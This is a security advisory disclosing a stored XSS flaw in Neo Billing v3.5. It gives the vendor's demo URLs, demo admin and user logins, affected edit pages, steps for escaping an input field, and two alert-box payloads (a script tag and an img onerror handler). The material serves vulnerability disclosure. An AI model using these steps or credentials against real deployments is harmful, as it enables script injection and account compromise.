[*] :: Title: Neo Billing - Accounting, Invoicing And CRM Software v3.5 Stored XSS Injection [*] :: Author: QUIXSS [*] :: Date: 2019-04-26 [*] :: Software: Neo Billing - Accounting, Invoicing And CRM Software v3.5 [?] :: Technical Details & Description: # Weak security measures like bad input fields data filtering has been discovered in the «Neo Billing - Accounting, Invoicing And CRM Software». Current version of this web-application is 3.5. [?] :: Demo Website: # https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547 # Backend (admin): http://billing.ultimatekode.com/neo/autologin/?role=1 # Backend (user): http://billing.ultimatekode.com/neo/crm # Login/Password (admin): superadmin@example.com/123456 # Login/Password (user): customer@example.com/123456 [!] :: Special Note: # Payloads like sample #1 is not recommended to use because it will break a page u are working with. It's better to use payload based on the sample #2. [!] :: For developers: # Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients. [+] :: PoC [Links]: # http://billing.ultimatekode.com/neo/projects # http://billing.ultimatekode.com/neo/productcategory/edit?id=15 # http://billing.ultimatekode.com/neo/stockreturn/edit?id=1063 [+] :: PoC [Stored XSS Injection]: # Authorize on the demo website for tests as admin or as a regular user, then go to any page with a text field, f.e. http://billing.ultimatekode.com/neo/productcategory/edit?id=13 # Click on «Edit» button and inside any text field type "> first just to «close» an input field, then use your payload, save the data and your code will be successfully injected. # Sample payload #1: "><script>alert('QUIXSS')</script> # Sample payload #2: "><img src="x" onerror="alert('QUIXSS');">